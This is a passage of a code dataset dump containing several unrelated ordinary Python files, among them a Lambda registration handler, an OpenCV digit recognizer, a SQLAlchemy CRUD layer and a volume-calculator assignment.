HttpMethod = 'Get')\n\n # userテーブルに登録する\n usertable = dynamodb.Table(\"user\")\n usertable.put_item(\n Item={\n 'id' : nextseq,\n 'username' : username,\n 'email' : email,\n 'accepted_at' : decimal.Decimal(str(now)),\n 'host' : host,\n 'url' : url\n }\n )\n\n\n # 結果を返す\n return {\n 'statusCode' : 200,\n 'headers' : {\n 'content-type' : 'text/html'\n },\n 'body' : '登録ありがとうございました。'\n }\n\n except:\n import traceback\n traceback.print_exc()\n return {\n 'statusCode' : 500,\n 'headers' : {\n 'content-type' : 'text/html'\n },\n 'body' : '内部エラーが発生しました。'\n }\n","sub_path":"signedURL.py","file_name":"signedURL.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"593884182","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 19 14:21:04 2016\n\n@author: George\n\"\"\"\n\n\nimport os, sys\nimport numpy\n\npath_to_github = 'C:\\\\Users\\\\George\\\\Documents\\\\GitHub'\n\nsys.path.insert(1,os.path.join(path_to_github,'Flika'));\nfrom FLIKA import *\napp = QApplication(sys.argv); initializeMainGui()\n\n\nfrom plugins.detect_puffs.gaussianFitting import fitGaussian\n\n# cutout bead \n# subtract background\nI_whole=g.m.currentWindow.image\n\nxorigin=100\nyorigin=100\nsigma=2\namplitude=800\np0=[xorigin, yorigin, sigma,amplitude]\nbounds=[(xorigin-5,xorigin+5), (yorigin-5,yorigin+5),(sigma-1, sigma+2), (amplitude-500, amplitude+500)]\n\n\nanswer = []\n\nfor i in range(len(I_whole)):\n I=I_whole[i]\n p, I_fit, I_fit = fitGaussian(I, p0, bounds)\n answer.append(p)\n\nfilename = 'J:\\\\WORK_IN_PROGRESS\\\\CellLights_AND_FIXATION\\\\cellLights_beads_100nm\\\\File_002_croppedBead3_result.txt'\nnp.savetxt(filename, answer, delimiter=',')\nprint(\"Result File Saved\")","sub_path":"UCI/guassianFit_bead_FLIKA 2.py","file_name":"guassianFit_bead_FLIKA 2.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"471925266","text":"#coding=utf-8\n\nfrom bs4 import BeautifulSoup\nimport re\nimport requests\nimport json\nfrom Provinces import 
Province\nfrom datetime import datetime\nfrom functions import *\n\nnow_txt = '{}年{}月{}日-{}时{}分.txt'.format(datetime.today().year,datetime.today().month,datetime.today().day,datetime.today().hour,datetime.today().minute)\nnow_csv = '{}年{}月{}日-{}时{}分.csv'.format(datetime.today().year,datetime.today().month,datetime.today().day,datetime.today().hour,datetime.today().minute)\n\nurl = \"https://3g.dxy.cn/newh5/view/pneumonia\"\nreq = requests.get(url)\nreq.encoding = 'utf-8'\n\ninfo_raw = BeautifulSoup(req.text, 'html.parser')\ninfo_raw = info_raw.find(id = \"getListByCountryTypeService1\").get_text()\npattern = re.compile(r'\\[.*\\]')\nresult = pattern.search(info_raw)\n\nresult_dict = json.loads(result.group())\n\nProvince_list = []\nfor item in result_dict:\n Province_list.append(Province(item['id'],item['createTime'],item['modifyTime'],item['provinceName'],item['provinceShortName'],item['sort'],item['tags']))\n\n#保存json文件\nwith open('D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record\\\\'+now_txt,'w+',encoding = 'utf-8') as file:\n file.write(result.group())\n\n#保存csv文件\nDicToCSV(result_dict,now_csv)\nToCSV_separately(Province_list)\n","sub_path":"GetInformation.py","file_name":"GetInformation.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"651498612","text":"import argparse\nimport sys\nimport os\nfrom distutils.util import strtobool\n\n# from http://stackoverflow.com/a/22222073\ndef user_yes_no_query(question):\n sys.stdout.write('%s [y/n]\\n' % question)\n while True:\n try:\n return strtobool(raw_input().lower())\n except ValueError:\n sys.stdout.write('Please respond with \\'y\\' or \\'n\\'.\\n')\n\ndef parse():\n \"\"\"\n Option parser\n \"\"\"\n # Parser definition.\n parser=argparse.ArgumentParser(description=\"Sort files from a source into a destination using their extension's.\")\n parser.add_argument('source', help=\"The source for the files.\")\n parser.add_argument('destination', help=\"The destination for the files.\")\n parser.add_argument('-f', '--force', dest='force', action='store_true', help=\"Disable interactive mode.\")\n parser.add_argument('-q', '--quick-sort', dest='quick', action='store_true', help=\"Disable file checksums for quick sorting. 
May result in data loss.\")\n# parser.add_argument('-l', '--log-level', dest='log', type=int, help=\"Specify source from where gathering files\")\n# parser.add_argument('-v', '--version', action='version', version='')\n\n # Print help if arguments parser fails.\n try:\n args = parser.parse_args()\n return(args)\n except:\n parser.print_help()\n sys.exit(1)\n\ndef validate(args):\n # Check the source and destination validity.\n if not os.path.isdir(args.source) and not os.path.isdir(args.destination):\n print(sys.argv[0] + \": error: `\" + args.source + \"` and `\" + args.destination + \"` are not directories.\")\n sys.exit(2)\n elif not os.path.isdir(args.destination):\n print(sys.argv[0] + \": error: `\" + args.destination + \"` is not a directory\")\n sys.exit(2)\n elif not os.path.isdir(args.source):\n print(sys.argv[0] + \": error: `\" + args.source + \"` is not a directory\")\n sys.exit(2)\n\n # Remove ending slash if ther's some.\n if args.source[-1] == '/': args.source = args.source[:-1]\n if args.destination[-1] == '/': args.destination = args.destination[:-1]\n\n # Prevent the destination being within the source.\n if args.source in args.destination and len(args.destination) >= len(args.source): \n print(sys.argv[0] + \": error: the destination can't be within the source.\")\n sys.exit(2)\n\n # Check if the source isn't empty.\n if not os.listdir(args.source):\n print(sys.argv[0] + \": error: `\" + args.source + \"` is empty.\")\n sys.exit(2)\n\n # Interactive for user validation.\n if not args.force:\n print(\"Use \" + args.source + \"/ as source and \" + args.destination + \"/ as destination for sorting ? \")\n if not user_yes_no_query(\"Are you sure ? \"):\n print(\"Bye then !\")\n sys.exit(2)","sub_path":"sorthoards/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"564422918","text":"import argparse\nimport lostfilm\n\ndef initdb():\n for s in dir(lostfilm):\n item = getattr(lostfilm, s)\n if hasattr(item, 'table_exists') \\\n and hasattr(item, 'create_table'):\n if not item.table_exists():\n print('Creating table for %s' % item)\n item.create_table()\n\ndef syncdb():\n lostfilm.serial.populate()\n\ndef print_serial_info(serial):\n print('id : %d' % serial.serial_id)\n print('en_US: %s' % serial.en_name)\n print('ru_RU: %s' % serial.ru_name)\n print\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Shitpile manipulator')\n parser.add_argument(\"-i\", \"--initdb\", action=\"store_true\",\n help=\"Create necessary tables\")\n parser.add_argument(\"-s\", \"--syncdb\", action=\"store_true\",\n help=\"Load data from website\")\n parser.add_argument(\"--find-serial\", action=\"store\",\n help=\"Find serial\")\n args = parser.parse_args()\n if args.initdb:\n initdb()\n if args.syncdb:\n syncdb()\n if args.find_serial != '':\n for i in lostfilm.serial.find_by_name(args.find_serial):\n print_serial_info(i)\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"166564061","text":"# -*- coding:utf-8 -*-\n\"\"\"使用矩描述图像的区域特征\"\"\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport cv2\nfrom pylab import np, plt\n# Import datasets, classifiers and performance metrics\nfrom sklearn import datasets, neighbors, metrics\n\n\ndef show_image(image, **kwargs):\n 
fig = plt.figure()\n    axe = fig.add_subplot(111)\n    axe.imshow(image, **kwargs)\n    plt.xticks(())\n    plt.yticks(())\n    fig.show()\n\n\ndef plot_gallery(images, titles, h, w, n_row=3, n_col=4):\n    \"\"\"Helper function to plot a gallery of portraits\"\"\"\n    plt.figure(figsize=(1.8 * n_col, 2.4 * n_row))\n    plt.subplots_adjust(bottom=0, left=.01, right=.99, top=.90, hspace=.35)\n    for i in range(n_row * n_col):\n        plt.subplot(n_row, n_col, i + 1)\n        plt.imshow(images[i].reshape((h, w)), cmap=plt.cm.gray)\n        plt.title(titles[i], size=12)\n        plt.xticks(())\n        plt.yticks(())\n\n\ndef make_module():\n    # The digits dataset\n    # http://archive.ics.uci.edu/ml/machine-learning-databases/pendigits/pendigits.names\n    # \tIn our study, we use only ($x, y$) coordinate information. The stylus\n    # pressure level values are ignored. First we apply normalization to\n    # make our representation invariant to translations and scale\n    # distortions. The raw data that we capture from the tablet consist of\n    # integer values between 0 and 500 (tablet input box resolution). The\n    # new coordinates are such that the coordinate which has the maximum\n    # range varies between 0 and 100. Usually $x$ stays in this range, since\n    # most characters are taller than they are wide.\n\n    digits = datasets.load_digits()\n    # To apply a classifier on this data, we need to flatten the image, to\n    # turn the data in a (samples, feature) matrix:\n    n_samples = len(digits.images)\n    half = int(n_samples / 2)\n    print('digits training set shape: ', digits.images.shape)\n    data = digits.images.reshape((n_samples, -1))\n    # Create a classifier: a k-nearest-neighbors classifier\n    classifier = neighbors.KNeighborsClassifier()\n\n    # We learn the digits on the full dataset (the half train/test split below is commented out)\n    classifier.fit(data, digits.target)\n\n    # Now predict the value of the digit on the second half:\n    # expected = digits.target[half:]\n    # predicted = classifier.predict(data[half:])\n    #\n    # print(\"Classification report for classifier %s:\\n%s\\n\"\n    #       % (classifier, metrics.classification_report(expected, predicted)))\n    # print(digits.images[0])\n    # show_image(digits.images[0])\n    # print(cv2.normalize(digits.images[0], digits.images[0], 0, 1, cv2.NORM_MINMAX))\n    return classifier\n\n\ndef recognize_digital_number(original_image):\n    # Bilateral filtering removes noise effectively while keeping edges sharp\n    # cv2.bilateralFilter(src, d, sigmaColor, sigmaSpace)\n    # d – Diameter of each pixel neighborhood that is used during filtering.\n    # If it is non-positive, it is computed from sigmaSpace\n    # 9 is the neighborhood diameter; the two 75s are the standard deviations of the spatial Gaussian and of the intensity-similarity Gaussian\n    # original_image = cv2.bilateralFilter(original_image, 9, 75, 75)\n    original_image = cv2.blur(original_image, (5, 5))  # ksize must be a tuple\n    # Convert to grayscale\n    gray = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)\n    # gray = cv2.equalizeHist(gray)\n    # Binarize the image with Otsu's threshold\n    # https://en.wikipedia.org/wiki/Otsu%27s_method\n    ret2, th = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n    show_image(th, cmap=plt.cm.gray)\n\n    # Compute the Hu moments\n    # https://en.wikipedia.org/wiki/Image_moment\n    # http://docs.opencv.org/2.4/modules/imgproc/doc/structural_analysis_and_shape_descriptors.html?highlight=moment#cv2.HuMoments\n    m = cv2.moments(th)\n    hu = cv2.HuMoments(m)\n    print('-' * 30)\n    for i in range(len(hu)):\n        print('hu[%d]: %f' % (i, hu[i]))\n    print('-' * 30)\n    # http://docs.opencv.org/2.4/modules/imgproc/doc/structural_analysis_and_shape_descriptors.html?highlight=findcontours#suzuki85\n    # http://wenku.baidu.com/link?url=OeYOUricBubk5u7AD-pTw1dV7cDtb5RwZDKM_H86NqF5U4CnOxsm9_4PcRN9YPpiJ4eNFi_XCo1pW_1WKeMsHJMtvxq-qCBvTY-zGP0fVOy\n    # 
第一个是输入图像,第二个是轮廓检索模式,第三个是轮廓近似方法。\n # 返回值有三个,第一个是图像,第二个是轮廓,第三个是(轮廓的)层析结构。\n # 轮廓(第二个返回值)是一个 Python 列表,其中存储这图像中的所有轮廓。每一个轮廓都是一个 Numpy 数组,包含对象边界点(x,y)的坐标。\n image, contours, hierarchy = cv2.findContours(th, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n n_samples = len(contours)\n print('检测到了 %d 个轮廓' % n_samples)\n image_copy = original_image.copy()\n nums = []\n for i, c in enumerate(contours):\n x, y, w, h = cv2.boundingRect(c)\n print('第 %2d 个轮廓的左上顶点为 (%3d, %3d), 宽高为 (%3d, %3d)' % (i, x, y, w, h))\n # 灰度图中截取图像\n num = gray[y:y + h, x: x + w]\n num = cv2.bitwise_not(num)\n # 调整大小\n num = cv2.resize(num, (8, 8), interpolation=cv2.INTER_AREA)\n # 归一化提高了识别正确率\n # 归一化:原始图像,结果图像,映射到结果图像中的最小值,最大值,归一化类型\n num = cv2.normalize(num, num, 0, 16, cv2.NORM_MINMAX)\n nums.append(num)\n image_copy = cv2.rectangle(image_copy, (x, y), (x + w, y + h), (0, 255, 0), 2)\n cv2.putText(image_copy, str(i), (x + w, y + int(h / 2)), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0), 2)\n # retval = cv2.boxPoints(cv2.minAreaRect(c))\n # print(retval)\n # x, y, w, h = retval\n # image = cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\n # 第一个参数是原始图像,第二个参数是轮廓,一个 Python 列表。第三个参数是轮廓的索引(在绘制独立轮廓是很有用,当设置为 -1 时绘制所有轮廓)。接下来的参数是轮廓的颜色和厚度等\n # image_with_contour = cv2.drawContours(original_image, contours, -1, (0, 255, 0), 2)\n nums = np.array(nums)\n return image_copy, nums.reshape((n_samples, -1))\n\n\n# cap = cv2.VideoCapture()\n# if not cap.isOpened():\n# print('camera is not opened!')\n# cap.open(0)\n#\n# while (cap.isOpened()):\n# ret, frame = cap.read()\n# recognize_digital_number(frame)\n# if cv2.waitKey(1) & 0xFF == ord('q'):\n# break\n# cap.release()\n# cv2.destroyAllWindows()\n\nclassifier = make_module()\n\nimg = cv2.imread('handwriting_digital_number.jpg')\n# img = cv2.imread('digital_number.png')\nimg, nums = recognize_digital_number(img)\nshow_image(img)\n# img = cv2.imread('digital_number.png')\n#\n# img, nums = recognize_digital_number(img)\n# show_image(img)\n# plot_gallery(nums, [str(i) for i in range(len(nums))], 8, 8, 2, 5)\n\n# cv2.waitKey(0)\n# while cv2.waitKey(1) & 0xFF != ord('q'):\n# continue\n\n# cv2.destroyAllWindows()\npredicted = classifier.predict(nums)\nplot_gallery(nums, ['predicted: %d' % p for p in predicted], 8, 8, 2, 5)\nplt.show()\n","sub_path":"image-processing/moment.py","file_name":"moment.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"594586330","text":"# ~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Import\r\nfrom packages import iSmart\r\n\r\n# Functions\r\ndef user(u_mode = 0):\r\n db_c_user = list(())\r\n with open(\"database/user.csv\",\"r\") as db_f_user:\r\n for db_c_user_category in db_f_user.readlines():\r\n if db_c_user_category.split(\",\")[0] == \"id\":\r\n db_c_user_index = int(db_c_user_category.split(\",\").index(\"name\"))\r\n else:\r\n if u_mode == 0:\r\n db_c_user.append(db_c_user_category.split(\",\")[db_c_user_index])\r\n elif u_mode == 1:\r\n db_c_user.append(db_c_user_category.split(\",\")[db_c_user_index].upper())\r\n db_f_user.close()\r\n return db_c_user\r\n\r\ndef new_id():\r\n with open(\"database/user.csv\",\"r\") as db_f_user:\r\n for db_c_user_category in db_f_user.readlines():\r\n ni_last_id = db_c_user_category.split(\",\")[0]\r\n ni_new_id = int(ni_last_id) + 1\r\n ni_new_text = \"\"\r\n ni_new_len = len(str(ni_new_id))\r\n if ni_new_len <= 5:\r\n ni_req_zero = 5 - ni_new_len\r\n for ni_each_zero in range(ni_req_zero):\r\n ni_new_text += \"0\"\r\n del ni_each_zero\r\n 
ni_new_text += str(ni_new_id)\r\n db_f_user.close()\r\n return ni_new_text\r\n\r\ndef id(i_user):\r\n with open(\"database/user.csv\",\"r\") as db_f_user:\r\n for db_c_user_category in db_f_user.readlines():\r\n if db_c_user_category.split(\",\")[1].upper() == i_user.upper():\r\n i_id = db_c_user_category.split(\",\")[0]\r\n break\r\n db_f_user.close()\r\n return i_id\r\n\r\ndef sport(s_id, s_mode = 0):\r\n s_sport = list(())\r\n with open(\"database/appointment.csv\",\"r\") as db_f_appointment:\r\n for db_c_appointment_category in db_f_appointment.readlines():\r\n if db_c_appointment_category.split(\",\")[0] == s_id:\r\n if s_mode == 0:\r\n s_sport.append(db_c_appointment_category.split(\",\")[1])\r\n elif s_mode == 1:\r\n s_sport.append(db_c_appointment_category.split(\",\")[1].upper())\r\n db_f_appointment.close()\r\n return s_sport\r\n\r\ndef bio(b_id):\r\n with open(\"database/user.csv\",\"r\") as db_f_user:\r\n for db_c_user_category in db_f_user.readlines():\r\n if db_c_user_category.split(\",\")[0] == b_id:\r\n b_name = db_c_user_category.split(\",\")[1]\r\n b_age = db_c_user_category.split(\",\")[2]\r\n b_gender = db_c_user_category.split(\",\")[3]\r\n break\r\n db_f_user.close()\r\n b_content = \"ID\\t: \"+ b_id +\"\\nName\\t: \"+ b_name +\"\\nAge\\t: \"+ b_age +\"\\nGender\\t: \"+ b_gender\r\n return b_content\r\n\r\ndef workout(w_id, w_sport):\r\n with open(\"database/appointment.csv\",\"r\") as db_f_appointment:\r\n for db_c_appointment_category in db_f_appointment.readlines():\r\n if db_c_appointment_category.split(\",\")[0] == w_id and db_c_appointment_category.split(\",\")[1] == w_sport:\r\n w_goal = db_c_appointment_category.split(\",\")[2]\r\n w_time = db_c_appointment_category.split(\",\")[3]\r\n w_record = db_c_appointment_category.split(\",\")[4]\r\n break\r\n db_f_appointment.close()\r\n w_time_read = iSmart.read(\"time\", w_time)\r\n w_record_read = iSmart.read(\"record\", w_record)\r\n w_content = \"Sport\\t: \"+ w_sport +\"\\nGoal\\t: \"+ w_goal +\" kcal\\nTime recommend\\t: \"+ w_time_read +\"\\nRecords\\t: \"+ w_record_read\r\n return w_content","sub_path":"packages/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"39843322","text":"from dataclasses import dataclass\nfrom typing import Any, Dict, List, Optional, Sequence, Set, Tuple, Union, cast\n\nfrom sqlalchemy import Column, Table, func, insert, select\nfrom sqlalchemy.sql import Select, and_, or_\nfrom sqlalchemy.sql.dml import Delete, Insert, Update\n\nfrom ..db.container import Database\nfrom ..pagination import (\n Pagination,\n PaginationVisitor,\n Search,\n SearchVisitor,\n fields_flip_sign,\n)\nfrom ..pagination.cursor import cursor_to_python\nfrom ..types import Connection, Record, Records\n\nQueryType = Union[Delete, Select, Update]\nSelectUpdate = Union[Select, Update]\n\n\nclass CrudDB(Database):\n \"\"\"A :class:`.Database` with additional methods for CRUD operations\"\"\"\n\n async def db_select(\n self,\n table: Table,\n filters: Dict,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> Records:\n \"\"\"Select rows from a given table\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n sql_query = self.get_query(\n table, table.select(), consumer=consumer, params=filters\n )\n async with 
self.ensure_connection(conn) as conn:\n return await conn.execute(sql_query)\n\n async def db_delete(\n self,\n table: Table,\n filters: Dict,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> Records:\n \"\"\"Delete rows from a given table\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n sql_query = self.get_query(\n table,\n table.delete().returning(*table.columns),\n consumer=consumer,\n params=filters,\n )\n async with self.ensure_connection(conn) as conn:\n return await conn.execute(sql_query)\n\n async def db_count(\n self,\n table: Table,\n filters: Optional[Dict] = None,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> int:\n \"\"\"Count rows in a table\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n sql_query = self.get_query(\n table, table.select(), consumer=consumer, params=filters\n )\n return await self.db_count_query(sql_query, conn=conn)\n\n async def db_count_query(\n self,\n sql_query: Select,\n *,\n conn: Optional[Connection] = None,\n ) -> int:\n count_query = select(func.count()).select_from(sql_query.alias(\"inner\"))\n async with self.ensure_connection(conn) as conn:\n result = await conn.execute(count_query)\n return result.scalar()\n\n async def db_insert(\n self,\n table: Table,\n data: Union[List[Dict], Dict],\n *,\n conn: Optional[Connection] = None,\n ) -> Records:\n \"\"\"Perform an insert into a table\n\n :param table: sqlalchemy Table\n :param data: key-value pairs for columns values\n :param conn: optional db connection\n \"\"\"\n async with self.ensure_connection(conn) as conn:\n sql_query = self.insert_query(table, data)\n return await conn.execute(sql_query)\n\n async def db_update(\n self,\n table: Table,\n filters: Dict,\n data: Dict,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> Records:\n \"\"\"Perform an update of rows\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows to update\n :param data: key-value pairs for updating columns values of selected rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n update = (\n cast(\n Update,\n self.get_query(\n table, table.update(), consumer=consumer, params=filters\n ),\n )\n .values(**data)\n .returning(*table.columns)\n )\n async with self.ensure_connection(conn) as conn:\n return await conn.execute(update)\n\n async def db_upsert(\n self,\n table: Table,\n filters: Dict,\n data: Optional[Dict] = None,\n *,\n conn: Optional[Connection] = None,\n consumer: Any = None,\n ) -> Record:\n \"\"\"Perform an upsert for a single record\n\n :param table: sqlalchemy Table\n :param filters: key-value pairs for filtering rows to update\n :param data: key-value pairs for updating columns values of selected rows\n :param conn: optional db connection\n :param consumer: optional consumer (see :meth:`.get_query`)\n \"\"\"\n if data:\n result = await self.db_update(\n table, filters, data, conn=conn, consumer=consumer\n )\n else:\n result = await self.db_select(table, filters, conn=conn, consumer=consumer)\n record = result.one_or_none()\n if record is None:\n insert_data = data.copy() if data else {}\n insert_data.update(filters)\n result = await 
self.db_insert(table, insert_data, conn=conn)\n record = result.one()\n return record\n\n async def db_paginate(\n self,\n table: Table,\n sql_query: Select,\n pagination: Pagination,\n *,\n conn: Optional[Connection] = None,\n ) -> Tuple[Records, Optional[int]]:\n pagination_visitor = DbPaginationVisitor(\n db=self, table=table, sql_query=sql_query\n )\n pagination.apply(pagination_visitor)\n async with self.ensure_connection(conn) as conn:\n return await pagination_visitor.execute(conn)\n\n # Query methods\n\n def insert_query(self, table: Table, records: Union[List[Dict], Dict]) -> Insert:\n if isinstance(records, dict):\n records = [records]\n else:\n cols: Set[str] = set()\n for record in records:\n cols.update(record)\n new_records = []\n for record in records:\n if len(record) < len(cols):\n record = record.copy()\n missing = cols.difference(record)\n for col in missing:\n record[col] = None\n new_records.append(record)\n records = new_records\n return insert(table).values(records).returning(*table.columns)\n\n # backward compatibility\n get_insert = insert_query\n\n def get_query(\n self,\n table: Table,\n sql_query: QueryType,\n *,\n params: Optional[Dict] = None,\n consumer: Any = None,\n ) -> QueryType:\n \"\"\"Build an SqlAlchemy query\n\n :param table: sqlalchemy Table\n :param sql_query: sqlalchemy query type\n :param params: key-value pairs for the query\n :param consumer: optional consumer for manipulating parameters\n \"\"\"\n filters: List = []\n columns = table.c\n params = params or {}\n\n for key, value in params.items():\n bits = key.split(\":\")\n field = bits[0]\n op = bits[1] if len(bits) == 2 else \"eq\"\n filter_field = getattr(consumer, f\"filter_{field}\", None)\n if filter_field:\n result = filter_field(op, value)\n else:\n field = getattr(columns, field)\n result = self.default_filter_field(field, op, value)\n if result is not None:\n if not isinstance(result, (list, tuple)):\n result = (result,)\n filters.extend(result)\n if filters:\n whereclause = and_(*filters) if len(filters) > 1 else filters[0]\n sql_query = cast(Select, sql_query).where(whereclause)\n return sql_query\n\n def search_query(\n self, table: Table, sql_query: SelectUpdate, search: Search\n ) -> SelectUpdate:\n \"\"\"Build an SqlAlchemy query for a search\n\n :param table: sqlalchemy Table\n :param sql_query: sqlalchemy query type\n :param search: the search dataclass\n \"\"\"\n search_visitor = DbSearchVisitor(\n db=self, table=table, sql_query=cast(SelectUpdate, sql_query)\n )\n search.apply(search_visitor)\n return search_visitor.sql_query\n\n def order_by_query(\n self,\n table: Table,\n sql_query: Select,\n order_by: Optional[Union[str, Sequence[str]]],\n ) -> Select:\n \"\"\"Apply ordering to a sql_query\"\"\"\n if isinstance(order_by, str):\n order_by = (order_by,)\n for name in order_by or ():\n if name.startswith(\"-\"):\n order_by_column = getattr(table.c, name[1:], None)\n if order_by_column is not None:\n order_by_column = order_by_column.desc()\n else:\n order_by_column = getattr(table.c, name, None)\n if order_by_column is not None:\n sql_query = sql_query.order_by(order_by_column)\n return sql_query\n\n # backward compatibility\n order_by = order_by_query\n\n def default_filter_field(self, field: Column, op: str, value: Any):\n \"\"\"\n Applies a filter on a field.\n\n Notes on 'ne' op:\n\n Example data: [None, 'john', 'roger']\n ne:john would return only roger (i.e. 
nulls excluded)\n ne: would return john and roger\n\n Notes on 'search' op:\n\n For some reason, SQLAlchemy uses to_tsquery rather than\n plainto_tsquery for the match operator\n\n to_tsquery uses operators (&, |, ! etc.) while\n plainto_tsquery tokenises the input string and uses AND between\n tokens, hence plainto_tsquery is what we want here\n\n For other database back ends, the behaviour of the match\n operator is completely different - see:\n http://docs.sqlalchemy.org/en/rel_1_0/core/sqlelement.html\n\n :param field: field name\n :param op: 'eq', 'ne', 'gt', 'lt', 'ge', 'le' or 'search'\n :param value: comparison value, string or list/tuple\n :return:\n \"\"\"\n multiple = isinstance(value, (list, tuple))\n\n if multiple and op in (\"eq\", \"ne\"):\n if op == \"eq\":\n return field.in_(value)\n elif op == \"ne\":\n return ~field.in_(value)\n else:\n if multiple:\n assert len(value) > 0\n value = value[0]\n\n if op == \"eq\":\n return field == value\n elif op == \"ne\":\n return field != value\n elif op == \"gt\":\n return field > value\n elif op == \"ge\":\n return field >= value\n elif op == \"lt\":\n return field < value\n elif op == \"le\":\n return field <= value\n\n\n@dataclass\nclass DbSearchVisitor(SearchVisitor):\n db: CrudDB\n table: Table\n sql_query: SelectUpdate\n\n def apply_search(self, search: str, search_fields: Sequence[str]) -> None:\n if search:\n columns = [getattr(self.table.c, col) for col in search_fields]\n self.sql_query = self.sql_query.where(\n or_(*(col.ilike(f\"%{search}%\") for col in columns))\n )\n\n\n@dataclass\nclass DbPaginationVisitor(PaginationVisitor):\n db: CrudDB\n table: Table\n sql_query: Select\n initial_sql: Optional[QueryType] = None\n\n def apply_offset_pagination(\n self,\n limit: int,\n offset: int,\n order_by: Optional[Union[str, Sequence[str]]],\n ) -> None:\n self.initial_sql = self.sql_query\n sql_query = self.db.order_by_query(self.table, self.sql_query, order_by)\n if offset:\n sql_query = sql_query.offset(offset)\n if limit:\n sql_query = sql_query.limit(limit)\n self.sql_query = sql_query\n\n def apply_cursor_pagination(\n self,\n cursor: Sequence[Tuple[str, str]],\n limit: int,\n order_by: Sequence[str],\n previous: bool = False,\n ) -> None:\n sql_query = self.sql_query\n for key, value in cursor:\n sql_query = sql_query.where(self.filter(key, value, previous))\n extra = 1\n if previous:\n extra += 1\n order_by = fields_flip_sign(order_by)\n self.sql_query = self.db.order_by_query(self.table, sql_query, order_by).limit(\n limit + extra\n )\n\n async def execute(self, conn: Connection) -> Tuple[Records, Optional[int]]:\n total = None\n if self.initial_sql is not None:\n total = await self.db.db_count_query(self.initial_sql, conn=conn)\n values = await conn.execute(self.sql_query)\n return values, total\n\n def filter(self, field: str, value: str, previous: bool) -> Column:\n if field.startswith(\"-\"):\n field = field[1:]\n op = \"ge\" if previous else \"le\"\n else:\n op = \"le\" if previous else \"ge\"\n column = getattr(self.table.c, field)\n py_value = cursor_to_python(column.type.python_type, value)\n return self.db.default_filter_field(column, op, py_value)\n","sub_path":"openapi/db/dbmodel.py","file_name":"dbmodel.py","file_ext":"py","file_size_in_byte":13697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"195889409","text":"'''\nCS 1026 Assignment 2: Volume Calculator\nBy Adam LaBrash\nStudent #251034920\nProgram presents volume calculated from volume.py (cubes, 
pyramids, or ellipsoids) based on user input\nFirst the input is verified and then once the volume is calculated, the values are presented in a string\n'''\n\nfrom volumes import *\n\n#Initialize list of lists, each list will contain the volumes of a shape\nshape_List = [[], [], []]\n\n\ndef verify_input():\n '''\n Function verifies input from user and calls appropriate function to calculate volume\n Function will continue prompting until user quits\n '''\n \n global shape_List\n\n while True:\n order = input('\\nEnter a shape ').lower()\n if order in ('quit', 'q'):\n break\n\n elif order in ('cube', 'c'):\n shape_List[0].append(cube())\n\n elif order in ('pyramid', 'p'):\n shape_List[1].append(pyramid())\n\n elif order in ('ellipsoid', 'e'):\n shape_List[2].append(ellipsoid())\n\n\ndef organize_volumes():\n '''\n Function checks if calculations took place (if volume lists empty)\n Joins and sorts volumes together into a presentable format\n '''\n\n noCalculations = True\n\n for volumeList in shape_List:\n if shape_List[shape_List.index(volumeList)]:\n noCalculations = False\n shape_List[shape_List.index(volumeList)].sort(key=float)\n shape_List[shape_List.index(volumeList)] = \", \".join(shape_List[shape_List.index(volumeList)])\n\n else:\n shape_List[shape_List.index(volumeList)] = 'No calculations required.'\n\n if noCalculations:\n print('You have reached the end of the session\\nYou did not perform any volume calculations')\n\n else:\n print('\\nYou have reached the end of your session \\nThe volumes calculated for each object are (from least to greatest):')\n print(f'\\nCube: {shape_List[0]}\\nPyramid: {shape_List[1]}\\nEllipsoid: {shape_List[2]}')\n\n\ndef main():\n verify_input()\n organize_volumes()\n\nmain()","sub_path":"Assignments/Assignment2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 